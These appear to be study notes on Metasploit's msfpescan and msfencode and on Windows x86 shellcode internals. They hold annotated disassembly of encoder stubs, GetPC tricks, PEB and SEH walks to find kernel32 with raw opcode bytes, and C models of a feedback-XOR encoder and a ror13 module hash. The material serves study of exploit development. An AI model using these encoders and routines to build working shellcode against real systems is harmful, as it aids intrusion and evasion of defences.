• Metasploit and shellcode encoding: study notes





    Using msfpescan, msfencode and related commands

    The commands below were noted down as I used them; they come up often.


    First locate memdump.exe:

    C:\Program Files\Metasploit\Framework3\msf3\tools\memdump\memdump.exe

    From a CMD prompt run:  memdump.exe <process PID> c:\abc   (dumps the process's memory segments into the c:\abc directory)

    Then go into the console

    and run:  msfpescan -p -M c:/abc > 1.txt   (-M tells msfpescan that the targets are memdump.exe output directories). That needs Ruby installed, which I skipped; running msfpescan -p xx.dll directly against the DLL is more convenient anyway.


    e.g.  msfpescan player.dll -p    searches the DLL for every pop/pop/ret sequence

    Usage: /msf3/msfpescan [mode] <options> [targets]
    
    Modes:
        -j, --jump [regA,regB,regC]      Search for jump equivalent instructions
        -p, --poppopret                  Search for pop+pop+ret combinations
        -r, --regex [regex]              Search for regex match
        -a, --analyze-address [address]  Display the code at the specified address
        -b, --analyze-offset [offset]    Display the code at the specified offset
        -f, --fingerprint                Attempt to identify the packer/compiler
        -i, --info                       Display detailed information about the image
        -R, --ripper [directory]         Rip all module resources to disk 
            --context-map [directory]    Generate context-map files
    
    Options:
        -M, --memdump                    The targets are memdump.exe directories
        -A, --after [bytes]              Number of bytes to show after match (-a/-b)
        -B, --before [bytes]             Number of bytes to show before match (-a/-b)
        -D, --disasm                     Disassemble the bytes at this address
        -I, --image-base [address]       Specify an alternate ImageBase
        -F, --filter-addresses [regex]   Filter addresses based on a regular expression
        -h, --help                       Show this message
    


    Next, encoding shellcode with msfencode:

    root@bt:/opt/framework/msf3# ./msfencode -h
    
        Usage: ./msfencode <options>
    
    OPTIONS:
    
        -a <opt>  The architecture to encode as
        -b <opt>  The list of characters to avoid: '\x00\xff'
        -c <opt>  The number of times to encode the data
        -d <opt>  Specify the directory in which to look for EXE templates
        -e <opt>  The encoder to use
        -h        Help banner
        -i <opt>  Encode the contents of the supplied file path
        -k        Keep template working; run payload in new thread (use with -x)
        -l        List available encoders
        -m <opt>  Specifies an additional module search path
        -n        Dump encoder information
        -o <opt>  The output file
        -p <opt>  The platform to encode for
        -s <opt>  The maximum size of the encoded data
        -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
        -v        Increase verbosity
        -x <opt>  Specify an alternate executable template
    

    root@bt:/opt/framework/msf3# ./msfencode -l
    
    Framework Encoders
    ==================
    
        Name                    Rank       Description
        ----                    ----       -----------
        cmd/generic_sh          good       Generic Shell Variable Substitution Command Encoder
        cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder
        cmd/printf_php_mq       manual     printf(1) via PHP magic_quotes Utility Command Encoder
        generic/none            normal     The "none" Encoder
        mipsbe/longxor          normal     XOR Encoder
        mipsle/longxor          normal     XOR Encoder
        php/base64              great      PHP Base64 encoder
        ppc/longxor             normal     PPC LongXOR Encoder
        ppc/longxor_tag         normal     PPC LongXOR Encoder
        sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
        x64/xor                 normal     XOR Encoder
        x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
        x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
        x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
        x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
        x86/context_cpuid       manual     CPUID-based Context Keyed Payload Encoder
        x86/context_stat        manual     stat(2)-based Context Keyed Payload Encoder
        x86/context_time        manual     time(2)-based Context Keyed Payload Encoder
        x86/countdown           normal     Single-byte XOR Countdown Encoder
        x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
        x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
        x86/nonalpha            low        Non-Alpha Encoder
        x86/nonupper            low        Non-Upper Encoder
        x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
        x86/single_static_bit   manual     Single Static Bit
        x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
        x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

    Several shellcode encoding schemes:

    The generated stub is different on every run: the initial value loaded into the key register, the instruction used to obtain the decoder's own address, the register that holds that address, the loop instruction, and the embedded constants all change from run to run.


    1)    x86/shikata_ga_nai   

    00427400    BA 99B20D32     mov edx,0x320DB299                 // initial XOR key
    00427405    DBC9            fcmovne st,st(1)                   // an FPU instruction, so fstenv has an instruction pointer to record
    00427407    D97424 F4       fstenv (28-byte) ptr ss:[esp-0xC]  // stores the address of that FPU instruction at [esp]; this only works if at least one FPU instruction has executed before it
                                                                   // that instruction can be fcmovne st,st(1), fldpi, fldz, ffree st(3), fcmovnb st,st, fcmovnbe st,st(5), ...
    0042740B    5D              pop ebp                            // ebp = 00427405 (GetPC)
    0042740C    29C9            sub ecx,ecx
    0042740E    B1 46           mov cl,0x46                        // 0x46 dwords to decode
    00427410    3155 13         xor dword ptr ss:[ebp+0x13],edx    // xor-decode one dword; [ebp+0x13] = 00427418, so the first round rewrites the displacement byte of the add below and the loop itself
    00427413    83C5 04         add ebp,0x4
    00427416    0355 96         add edx,dword ptr ss:[ebp-0x6A]    // feedback: add the dword just decoded to the key (the -0x6A displacement is the not-yet-decoded byte)
    00427419  ^E2 F5           loopd Xtest1231.00427410           // LOOP over all encoded dwords
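As an added example (not code from the original post), here is the decode loop above modelled in C together with the encoder side that msfencode runs: every dword is XORed with the key, and the key is then advanced by the dword just decoded (the additive feedback). The key search at the end is what `-b '\x00'` does: it retries until neither the payload nor the key immediate embedded in the stub (the `mov edx,0x320DB299`) contains a bad character. The key 0x320DB299 is the edx value from the listing; the 16-byte sample payload, the function names and the fixed trial-key sequence are this example's own constructions, and the sample is not a working shellcode.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Byte-wise dword access: x86 shellcode is little-endian, the host may not be. */
static uint32_t get_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* The decoder loop from the listing: xor [ebp+0x13],edx / add ebp,4 / add edx,<decoded dword>.
 * n must be a multiple of 4. */
void fb_xor_decode(uint8_t *buf, size_t n, uint32_t key) {
    for (size_t i = 0; i + 4 <= n; i += 4) {
        uint32_t plain = get_le32(buf + i) ^ key;
        put_le32(buf + i, plain);
        key += plain;                 /* feedback: the next key depends on decoded data */
    }
}

/* Encoder side: same feedback chain, so decode(encode(x)) == x. */
void fb_xor_encode(uint8_t *buf, size_t n, uint32_t key) {
    for (size_t i = 0; i + 4 <= n; i += 4) {
        uint32_t plain = get_le32(buf + i);
        put_le32(buf + i, plain ^ key);
        key += plain;
    }
}

int has_bad_char(const uint8_t *buf, size_t n, const uint8_t *bad, size_t nbad) {
    for (size_t i = 0; i < n; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j]) return 1;
    return 0;
}

/* Key search, the part that makes -b work. The key is embedded in the stub as
 * an immediate, so its own four bytes must be clean as well. On success returns
 * 1, leaves buf encoded and sets *key_out; on failure returns 0 with buf restored. */
int find_clean_key(uint8_t *buf, size_t n, const uint8_t *bad, size_t nbad,
                   uint32_t start, uint32_t tries, uint32_t *key_out) {
    for (uint32_t k = 0; k < tries; k++) {
        uint32_t key = start + k * 0x9E3779B9u;   /* arbitrary spread of trial keys */
        uint8_t kb[4];
        put_le32(kb, key);
        if (has_bad_char(kb, 4, bad, nbad)) continue;
        fb_xor_encode(buf, n, key);
        if (!has_bad_char(buf, n, bad, nbad)) { *key_out = key; return 1; }
        fb_xor_decode(buf, n, key);               /* undo, try the next key */
    }
    return 0;
}

/* Constructed sample "payload" (not a working shellcode): it carries the 0x00
 * bytes that a typical exploit buffer cannot contain. */
static const uint8_t SAMPLE[16] = {
    0x31,0xC0,0x50,0x68,0x63,0x61,0x6C,0x63,
    0x54,0x5B,0x50,0x53,0xB8,0x00,0x00,0x00 };
static const uint32_t LISTING_KEY = 0x320DB299u;   /* the edx value in the listing */

/* First encoded dword with the listing's key: 0x6850C031 ^ 0x320DB299. */
uint32_t first_encoded_dword(void) {
    uint8_t buf[16];
    memcpy(buf, SAMPLE, sizeof buf);
    fb_xor_encode(buf, sizeof buf, LISTING_KEY);
    return get_le32(buf);
}

/* Encode, decode, and report whether the bytes changed and came back intact. */
int demo_roundtrip(void) {
    uint8_t buf[16];
    memcpy(buf, SAMPLE, sizeof buf);
    fb_xor_encode(buf, sizeof buf, LISTING_KEY);
    int changed = memcmp(buf, SAMPLE, sizeof buf) != 0;
    fb_xor_decode(buf, sizeof buf, LISTING_KEY);
    return changed && memcmp(buf, SAMPLE, sizeof buf) == 0;
}

/* Find a key that keeps 0x00 out of both the stub immediate and the payload,
 * then check that decoding with it restores SAMPLE. */
int demo_clean_key(void) {
    static const uint8_t bad[] = { 0x00 };
    uint8_t buf[16];
    uint32_t key;
    memcpy(buf, SAMPLE, sizeof buf);
    if (!find_clean_key(buf, sizeof buf, bad, 1, LISTING_KEY, 256, &key)) return 0;
    if (has_bad_char(buf, sizeof buf, bad, 1)) return 0;
    fb_xor_decode(buf, sizeof buf, key);
    return memcmp(buf, SAMPLE, sizeof buf) == 0;
}

int main(void) {
    printf("first encoded dword: 0x%08X\n", first_encoded_dword());
    printf("roundtrip ok: %d, clean key found: %d\n", demo_roundtrip(), demo_clean_key());
    return 0;
}
```

The real encoder also has to keep the decoder stub itself free of bad characters, which is why shikata_ga_nai varies the GetPC instruction and register choice from run to run; the model above only covers the payload and the key immediate.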
    

    2) x86/alpha_mixed    the idea is to regenerate the original code in place, one byte per loop iteration

    00427400 >  89E0            mov eax,esp
    00427402    DBD3            fcmovnbe st,st(3)
    00427404    D970 F4         fstenv (28-byte) ptr ds:[eax-0xC]
    00427407    5D              pop ebp
    00427408    55              push ebp
    00427409    59              pop ecx
    0042740A    49              dec ecx
    0042740B    49              dec ecx
    0042740C    49              dec ecx
    0042740D    49              dec ecx
    0042740E    49              dec ecx
    0042740F    49              dec ecx
    00427410    49              dec ecx
    00427411    49              dec ecx
    00427412    49              dec ecx
    00427413    49              dec ecx
    00427414    43              inc ebx
    00427415    43              inc ebx
    00427416    43              inc ebx
    00427417    43              inc ebx
    00427418    43              inc ebx
    00427419    43              inc ebx
    0042741A    37              aaa
    0042741B    51              push ecx
    0042741C    5A              pop edx
    0042741D    6A 41           push 0x41
    0042741F    58              pop eax
    00427420    50              push eax
    00427421    3041 30         xor byte ptr ds:[ecx+0x30],al
    00427424    41              inc ecx
    00427425    6B41 41 10      imul eax,dword ptr ds:[ecx+0x41],0x10
    00427429    3241 42         xor al,byte ptr ds:[ecx+0x42]
    0042742C    3242 42         xor al,byte ptr ds:[edx+0x42]
    0042742F    3042 42         xor byte ptr ds:[edx+0x42],al
    00427432    41              inc ecx
    00427433    42              inc edx
    00427434    58              pop eax
    00427435    50              push eax
    00427436    3841 42         cmp byte ptr ds:[ecx+0x42],al
    00427439  ^ 75 E9           jnz Xtest1231.00427424
    

    3) x86/fnstenv_mov    again decodes in place to produce the original code

    00427400 >  6A 3F           push 0x3F
    00427402    59              pop ecx
    00427403    D9EE            fldz
    00427405    D97424 F4       fstenv (28-byte) ptr ss:[esp-0xC]                  ; fldz + fstenv obtain the current address, which the decode loop works from
    00427409    5B              pop ebx                                             ; ebx = 00427403
    0042740A    8173 13 413EFDC>xor dword ptr ds:[ebx+0x13],0xC3FD3E41             ; decodes from 00427416 onward
    00427411    83EB FC         sub ebx,-0x4
    00427414  ^ E2 F4           loopd Xtest1231.0042740A
    00427416    D9EB            fldpi
    

    4) x86/call4_dword_xor                 

    00427400 >  31C9            xor ecx,ecx
    00427402    83E9 C1         sub ecx,-0x3F                              ; ecx = 0x3F dwords
    00427405    E8 FFFFFFFF     call test1231.00427409                     ; unlike the above, this is call $+4: it pushes the address of the next instruction (0042740A) and lands on the call's own last byte
    0042740A    C05E 81 76      rcr byte ptr ds:[esi-0x7F],0x76            ; the debugger's linear disassembly from here on is misleading, because execution actually resumes at 00427409
    0042740E    0E              push cs
    0042740F    D6              salc
    00427410    8A28            mov ch,byte ptr ds:[eax]
    00427412    AC              lods byte ptr ds:[esi]
    00427413    83EE FC         sub esi,-0x4
    00427416  ^ E2 F4           loopd Xtest1231.0042740C

    Read from 00427409, the same bytes are the real stub:

    00427409    FFC0            inc eax                                    ; harmless leftover byte of the call
    0042740B    5E              pop esi                                    ; esi = 0042740A (GetPC)
    0042740C    8176 0E D68A28AC xor dword ptr ds:[esi+0xE],0xAC288AD6     ; decode one dword, starting at 00427418
    00427413    83EE FC         sub esi,-0x4
    00427416  ^ E2 F4           loopd 0042740C
    

    5) skylined alpha3

    http://bbs.pediy.com/showthread.php?t=156913  the MFC sample collected by 半斤八两 uses this encoder

    ~~~ Side note: changing the icon in the top-left corner of an MFC window

    HICON m_hIcon;
    m_hIcon = AfxGetApp()->LoadIcon(IDI_ICON1); // IDI_ICON1 is the resource ID; use the resource ID of whichever icon you want
    SetIcon(m_hIcon, TRUE);

    Note: to use it, EIP must be at the first byte of the shellcode and EAX must point to that same byte
    The whole payload is converted into printable bytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    00427400    50              push eax                                 ; eax points to the first byte of the shellcode on entry
    00427401    59              pop ecx
    00427402    49              dec ecx
    00427403    49              dec ecx
    00427404    49              dec ecx
    00427405    49              dec ecx
    00427406    49              dec ecx
    00427407    49              dec ecx
    00427408    49              dec ecx
    00427409    49              dec ecx
    0042740A    49              dec ecx
    0042740B    49              dec ecx
    0042740C    49              dec ecx
    0042740D    49              dec ecx
    0042740E    49              dec ecx
    0042740F    49              dec ecx
    00427410    49              dec ecx
    00427411    49              dec ecx
    00427412    37              aaa
    00427413    51              push ecx
    00427414    5A              pop edx
    00427415    6A 41           push 0x41
    00427417    58              pop eax
    00427418    50              push eax
    00427419    3041 30         xor byte ptr ds:[ecx+0x30],al
    0042741C    41              inc ecx
    0042741D    6B41 41 10      imul eax,dword ptr ds:[ecx+0x41],0x10
    00427421    3241 42         xor al,byte ptr ds:[ecx+0x42]
    00427424    3242 42         xor al,byte ptr ds:[edx+0x42]
    00427427    3042 42         xor byte ptr ds:[edx+0x42],al
    0042742A    41              inc ecx
    0042742B    42              inc edx
    0042742C    58              pop eax
    0042742D    50              push eax
    0042742E    3841 42         cmp byte ptr ds:[ecx+0x42],al
    00427431  ^ 75 E9           jnz Xtest1231.0042741C
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    GetPC techniques ~~~~~~~~~~~~~~~~~~~~~~~~

    1) call $+4   (note: call $+5 is not usable, since E8 00 00 00 00 is four null bytes)

    00427400    E8 FFFFFFFF     call test1231.00427404   ; pushes 00427405 and jumps to 00427404, the call's own last byte: FF C3 there decodes as inc ebx (harmless), then pop ecx leaves 00427405 in ecx
    00427405    C3              retn                     ; shown as retn by the linear disassembly, but this byte is consumed by the FF C3 above
    00427406    59              pop ecx
    

    2)  FSTENV

    00427403    D9EE            fldz                                 ; any FPU instruction
    00427405    D97424 F4       fstenv (28-byte) ptr ss:[esp-0xC]     ; saves the FPU environment after that instruction ran; the address of the last FPU instruction sits at offset 0xC of the 28-byte environment, so with esp-0xC as the base it lands at [esp] and one pop retrieves it

    3) Backward call

    00427400   /EB 03           jmp Xtest1231.00427405      ; 1) jump forward over the pop/call
    00427402   |5E              pop esi                     ; 3) esi = 0042740A
    00427403   |FFD6            call esi                    ; 4) pushes 00427405 and continues at 0042740A
    00427405   E8 F8FFFFFF     call test1231.00427402       ; 2) pushes the address of the next instruction (0042740A) and calls backwards
    0042740A    49              dec ecx                     ; [esp] = 00427405
    
    4) SEH GetPC

    Finding kernel32.dll, since we want LoadLibrary and GetProcAddress from it

    lkd> dt _peb
    nt!_PEB
       +0x000 InheritedAddressSpace : UChar
       +0x001 ReadImageFileExecOptions : UChar
       +0x002 BeingDebugged    : UChar
       +0x003 SpareBool        : UChar
       +0x004 Mutant           : Ptr32 Void
       +0x008 ImageBaseAddress : Ptr32 Void
       +0x00c Ldr              : Ptr32 _PEB_LDR_DATA
       +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
       +0x014 SubSystemData    : Ptr32 Void
       ...
    
    lkd> dt _PEB_LDR_DATA
    nt!_PEB_LDR_DATA
       +0x000 Length           : Uint4B
       +0x004 Initialized      : UChar
       +0x008 SsHandle         : Ptr32 Void
       +0x00c InLoadOrderModuleList : _LIST_ENTRY
       +0x014 InMemoryOrderModuleList : _LIST_ENTRY
       +0x01c InInitializationOrderModuleList : _LIST_ENTRY
       +0x024 EntryInProgress  : Ptr32 Void
    
    lkd> dt _ldr_data_table_entry  
    nt!_LDR_DATA_TABLE_ENTRY
       +0x000 InLoadOrderLinks : _LIST_ENTRY
       +0x008 InMemoryOrderLinks : _LIST_ENTRY
       +0x010 InInitializationOrderLinks : _LIST_ENTRY
       +0x018 DllBase          : Ptr32 Void
       +0x01c EntryPoint       : Ptr32 Void
       +0x020 SizeOfImage      : Uint4B
       +0x024 FullDllName      : _UNICODE_STRING
       +0x02c BaseDllName      : _UNICODE_STRING
       +0x034 Flags            : Uint4B
       ...

    lkd> dt _UNICODE_STRING
    nt!_UNICODE_STRING
       +0x000 Length           : Uint2B
       +0x002 MaximumLength    : Uint2B
       +0x004 Buffer           : Ptr32 Uint2B


    1) Via the PEB

    (1) Via Ldr + 0xC, InLoadOrderModuleList                                               portable ~~~~~~

    0040D4AF  |.  33D2          xor edx,edx
    0040D4B1  |.  64:8B5A 30    mov ebx,dword ptr fs:[edx+0x30]          ;  PEB
    0040D4B5  |.  8B5B 0C       mov ebx,dword ptr ds:[ebx+0xC]           ;  Ldr
    0040D4B8  |.  8B5B 0C       mov ebx,dword ptr ds:[ebx+0xC]           ;  InLoadOrderModuleList.Flink = first entry (the exe)
    ###  InLoadOrderLinks is the first field of LDR_DATA_TABLE_ENTRY, so the list pointer is the entry itself
    0040D4BB  |.  8B1B          mov ebx,dword ptr ds:[ebx]               ;  second entry
    ###  WIN7: [ebx+0x18] is now the base of SysWOW64\ntdll.dll; XP SP3: system32\ntdll.dll
    0040D4BD  |.  8B1B          mov ebx,dword ptr ds:[ebx]               ;  third entry
    ###  WIN7: [ebx+0x18] is now the base of SysWOW64\kernel32.dll; XP SP3: system32\kernel32.dll
    0040D4BF  |.  8B5B 18       mov ebx,dword ptr ds:[ebx+0x18]          ;  +0x018 DllBase          : Ptr32 Void
    0040D4C2  |.  8BEB          mov ebp,ebx                              ;  kernel32.74CB0000
    33 D2 64 8B 5A 30 8B 5B 0C 8B 5B 0C 8B 1B 8B 1B 8B 5B 18 8B EB

    (2) Via Ldr + 0x14, InMemoryOrderModuleList                                            portable ~~~~~~

    0040D4AF      33DB                  xor ebx,ebx
    0040D4B1      64:8B5B 30            mov ebx,dword ptr fs:[ebx+0x30]
    0040D4B5      8B5B 0C               mov ebx,dword ptr ds:[ebx+0xC]            ;  Ldr
    0040D4B8      8B5B 14               mov ebx,dword ptr ds:[ebx+0x14]           ;  InMemoryOrderModuleList.Flink = first entry (the exe)
    0040D4BB      8B1B                  mov ebx,dword ptr ds:[ebx]                ;  second entry
    ### InMemoryOrderLinks sits at +0x8 in the entry, so every field is 8 bytes closer. WIN7: [ebx+0x20] (FullDllName.Buffer) points at "...\SysWOW64\ntdll.dll"; XP SP3: "...\system32\ntdll.dll"
    0040D4BD      8B1B                  mov ebx,dword ptr ds:[ebx]                ;  third entry
    ### WIN7: [ebx+0x20] points at "...\SysWOW64\kernel32.dll"; XP SP3: "...\system32\kernel32.dll"
    0040D4BF      8B5B 10               mov ebx,dword ptr ds:[ebx+0x10]           
    ### [ebx+0x10] is DllBase (0x18 - 0x8)
    
    

    33 DB 64 8B 5B 30 8B 5B 0C 8B 5B 14 8B 1B 8B 1B 8B 5B 10 8B EB

    (3) The following also works on Windows 2000: walk the list and check a hash of BaseDllName:                      portable ~~~~~~

    0040D4AF      FC            cld
    0040D4B0      33D2          xor edx,edx
    0040D4B2      64:8B52 30    mov edx,dword ptr fs:[edx+0x30]
    0040D4B6      8B52 0C       mov edx,dword ptr ds:[edx+0xC]
    0040D4B9      8B52 14       mov edx,dword ptr ds:[edx+0x14]          ;  InMemoryOrderModuleList
    0040D4BC      8B72 28       mov esi,dword ptr ds:[edx+0x28]          ;  BaseDllName.Buffer (0x30 - 0x8)
    0040D4BF      6A 18         push 0x18                                ;  kernel32.dll: 12 chars * 2 bytes = 0x18
    0040D4C1      59            pop ecx
    0040D4C2      33FF          xor edi,edi
    0040D4C4      33C0          xor eax,eax
    0040D4C6      AC            lods byte ptr ds:[esi]
    0040D4C7      3C 61         cmp al,0x61                              ;  cmp al,'a'
    0040D4C9      7C 02         jl Xtest1231.0040D4CD
    0040D4CB      2C 20         sub al,0x20                              ;  fold lowercase to uppercase
    0040D4CD      C1CF 0D       ror edi,0xD
    0040D4D0      03F8          add edi,eax
    0040D4D2    ^ E2 F0         loopd Xtest1231.0040D4C4
    0040D4D4      81FF 5BBC4A6A cmp edi,0x6A4ABC5B                       ;  ror13 hash of "KERNEL32.DLL" as UTF-16
    0040D4DA      8B5A 10       mov ebx,dword ptr ds:[edx+0x10]          ;  DllBase
    0040D4DD      8B12          mov edx,dword ptr ds:[edx]               ;  next InMemoryOrderLinks
    0040D4DF    ^ 75 DB         jnz Xtest1231.0040D4BC                   ;  on fall-through ebx = kernel32.dll base
    

    FC 33 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 6A 18 59 33 FF 33 C0 AC 3C 61 7C 02 2C 20 C1 CF
    0D 03 F8 E2 F0 81 FF 5B BC 4A 6A 8B 5A 10 8B 12 75 DB

    (4) Ldr + 0x1C, InInitializationOrderModuleList, checking the name length                    portable ~~~~~

    0040D4AF      33C9          xor ecx,ecx
    0040D4B1      64:8B71 30    mov esi,dword ptr fs:[ecx+0x30]
    0040D4B5      8B76 0C       mov esi,dword ptr ds:[esi+0xC]      ;  Ldr
    0040D4B8      8B76 1C       mov esi,dword ptr ds:[esi+0x1C]     ;  InInitializationOrderModuleList.Flink
    0040D4BB      8B6E 08       mov ebp,dword ptr ds:[esi+0x8]      ;  esi+0x8 = DllBase (0x18 - 0x10)
    0040D4BE      8B7E 20       mov edi,dword ptr ds:[esi+0x20]     ;  esi+0x20 = BaseDllName.Buffer (0x30 - 0x10)
    0040D4C1      8B36          mov esi,dword ptr ds:[esi]          ;  next InInitializationOrderLinks
    0040D4C3      384F 18       cmp byte ptr ds:[edi+0x18],cl       ;  is the 13th UTF-16 character 0, i.e. is the name 12 characters long?
                                                                    ;  len(KERNELBASE.dll)=14, len(kernel32.dll)=12; a shorter name such as ntdll.dll only fails this check if the bytes past its terminator happen to be non-zero
    0040D4C6    ^ 75 F3         jnz Xtest1231.0040D4BB              ;  on fall-through ebp = kernel32 base

    33 C9 64 8B 71 30 8B 76 0C 8B 76 1C 8B 6E 08 8B 7E 20 8B 36 38 4F 18 75 F3
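Added example, not code from the original post: the hash loop of technique (3) and the length check of (4), written in C so they can be run on any host. The hash folds each byte of the UTF-16LE BaseDllName to uppercase and computes edi = ror(edi,13) + byte over exactly 0x18 bytes, which is why the constant 0x6A4ABC5B from the listing matches kernel32.dll regardless of case. The module list walked here is a constructed array of names standing in for the real InMemoryOrderModuleList, and the pad byte passed to the length check stands in for whatever memory follows a shorter name's terminator, which is what decides whether technique (4) misfires.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define MAX_NAME 64

static uint32_t ror32(uint32_t v, unsigned n) { return (v >> n) | (v << (32 - n)); }

/* Inner loop of technique (3): hash nbytes bytes of a UTF-16LE name.
 * (int8_t) reproduces the signed "cmp al,'a' / jl": bytes >= 0x80 are
 * negative and are left alone; 'a'..'z' become 'A'..'Z'. */
uint32_t ror13_module_hash(const uint8_t *name, size_t nbytes) {
    uint32_t edi = 0;
    for (size_t i = 0; i < nbytes; i++) {
        uint8_t al = name[i];
        if ((int8_t)al >= 'a') al -= 0x20;
        edi = ror32(edi, 13) + al;
    }
    return edi;
}

/* Lay an ASCII name out as the loader's UNICODE_STRING buffer holds it:
 * UTF-16LE, NUL-terminated, with `pad` filling the rest of the buffer to
 * stand in for whatever memory follows the terminator. Returns Length in bytes. */
size_t to_utf16le(const char *s, uint8_t *buf, size_t bufsz, uint8_t pad) {
    size_t n = strlen(s);
    memset(buf, pad, bufsz);
    for (size_t i = 0; i < n && 2 * i + 1 < bufsz; i++) {
        buf[2 * i] = (uint8_t)s[i];
        buf[2 * i + 1] = 0;
    }
    if (2 * n + 1 < bufsz) { buf[2 * n] = 0; buf[2 * n + 1] = 0; }
    return 2 * n;
}

/* Hash of a name over its own Length (0x18 for kernel32.dll). */
uint32_t ror13_ascii_hash(const char *s) {
    uint8_t buf[2 * MAX_NAME + 2];
    size_t len = to_utf16le(s, buf, sizeof buf, 0);
    return ror13_module_hash(buf, len);
}

/* Walk a constructed module list in memory order the way the shellcode does:
 * always hash 0x18 bytes from BaseDllName.Buffer and stop at the first match.
 * Returns the index, or -1 if the walk falls off the end of the list. */
int find_module_by_hash(const char *const *names, size_t count, uint32_t want) {
    for (size_t i = 0; i < count; i++) {
        uint8_t buf[2 * MAX_NAME + 2];
        to_utf16le(names[i], buf, sizeof buf, 0);
        if (ror13_module_hash(buf, 0x18) == want) return (int)i;
    }
    return -1;
}

/* Technique (4): "cmp byte ptr [edi+0x18],0" tests the low byte of the 13th
 * code unit, which is the terminator only for a 12-character name. */
int passes_len12_check(const char *name, uint8_t pad) {
    uint8_t buf[2 * MAX_NAME + 2];
    to_utf16le(name, buf, sizeof buf, pad);
    return buf[0x18] == 0;
}

/* Constructed list standing in for InMemoryOrderModuleList: exe, ntdll, kernel32. */
int demo_find_kernel32(void) {
    static const char *const mods[] = { "test1231.exe", "ntdll.dll", "kernel32.dll" };
    return find_module_by_hash(mods, 3, 0x6A4ABC5Bu);
}

int main(void) {
    printf("hash(kernel32.dll) = 0x%08X\n", ror13_ascii_hash("kernel32.dll"));
    printf("kernel32 index in sample list = %d\n", demo_find_kernel32());
    printf("len12 check: kernel32=%d KERNELBASE=%d ntdll(pad AA)=%d ntdll(pad 00)=%d\n",
           passes_len12_check("kernel32.dll", 0xAA), passes_len12_check("KERNELBASE.dll", 0xAA),
           passes_len12_check("ntdll.dll", 0xAA), passes_len12_check("ntdll.dll", 0x00));
    return 0;
}
```

The last two calls show the weak spot of technique (4): ntdll.dll (9 characters) is correctly rejected only because the example fills the bytes after its terminator with 0xAA; with zero padding it passes the check and the shellcode would take ntdll's base for kernel32's.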


    (5) Not portable: Win7 and XP differ    Ldr + 0x1C, InInitializationOrderModuleList      NOT portable ~~~~~~

    0040D4AF      33C0          xor eax,eax
    0040D4B1      64:8B40 30    mov eax,dword ptr fs:[eax+0x30]
    0040D4B5      8B40 0C       mov eax,dword ptr ds:[eax+0xC]     ;  Ldr
    0040D4B8      8B70 1C       mov esi,dword ptr ds:[eax+0x1C]    ;  InInitializationOrderModuleList.Flink = first entry (ntdll)
    0040D4BB      AD            lods dword ptr ds:[esi]            ;  eax = second entry
                                                                   ;  WIN7: FullDllName.Buffer at [eax+0x18] is syswow64\KERNELBASE.dll
                                                                   ;  XP SP3: system32\kernel32.dll, so on XP [eax+0x8] is already the kernel32 base
    0040D4BC      8B00          mov eax,dword ptr ds:[eax]         ;  eax = third entry
                                                                   ;  WIN7: FullDllName.Buffer at [eax+0x18] is syswow64\kernel32.dll
                                                                   ;  XP SP3: kernel32 was the previous entry, so this step goes one too far; hence "not portable"
    0040D4BE      8B40 08       mov eax,dword ptr ds:[eax+0x8]     ;  [eax+0x8] is DllBase (0x18 - 0x10): kernel32.74CB0000 on Win7
    

    On Win7 the target here is a 32-bit (WOW64) process, which is why the 32-bit structure offsets apply and the SysWOW64 copies of the DLLs show up.



    Below, a quick SEH refresher

    ntdll!_TEB  
    struct _TEB, 66 elements, 0xfb8 bytes  
       +0x000 NtTib            : struct _NT_TIB, 8 elements, 0x1c bytes  
          +0x000 ExceptionList    : Ptr32 to struct _EXCEPTION_REGISTRATION_RECORD,2 elements, 0x8 bytes  
             +0x000 Next             : Ptr32 to struct _EXCEPTION_REGISTRATION_RECORD, 2 elements, 0x8 bytes  
             +0x004 Handler          : Ptr32 to           _EXCEPTION_DISPOSITION   
          +0x004 StackBase        : Ptr32 to Void  
          +0x008 StackLimit       : Ptr32 to Void  
          +0x00c SubSystemTib     : Ptr32 to Void  
          +0x010 FiberData        : Ptr32 to Void  
          +0x010 Version          : Uint4B  
    

    2) Via SEH

    The technique below assumes that the last exception handler in the chain (the record whose Next is 0xffffffff) points into kernel32.dll. Once that handler pointer is found,

    walk backwards page by page to the top of the module and compare its first two bytes against "MZ".

    If the last handler does not point into kernel32.dll the technique obviously fails.

    Fails on my Win7 ~~~~~~~~~~~~~~~~~~~

    0040D4AF      56            push esi
    0040D4B0      51            push ecx
    0040D4B1      33C9          xor ecx,ecx                       ;  ecx = 0
    0040D4B3      64:8B31       mov esi,dword ptr fs:[ecx]        ;  esi = NtTib.ExceptionList = pointer to the first registration record
    0040D4B6      AD            lods dword ptr ds:[esi]           ;  eax = record.Next (0xffffffff at the end of the chain)
    0040D4B7      96            xchg eax,esi                      ;  esi = the Next record,
                                                                     eax = the record just read
    0040D4B8      390E          cmp dword ptr ds:[esi],ecx        ;  is [esi].Next negative? only 0xffffffff is, so this loops until the last record
    0040D4BA    ^ 79 FA         jns Xtest1231.0040D4B6
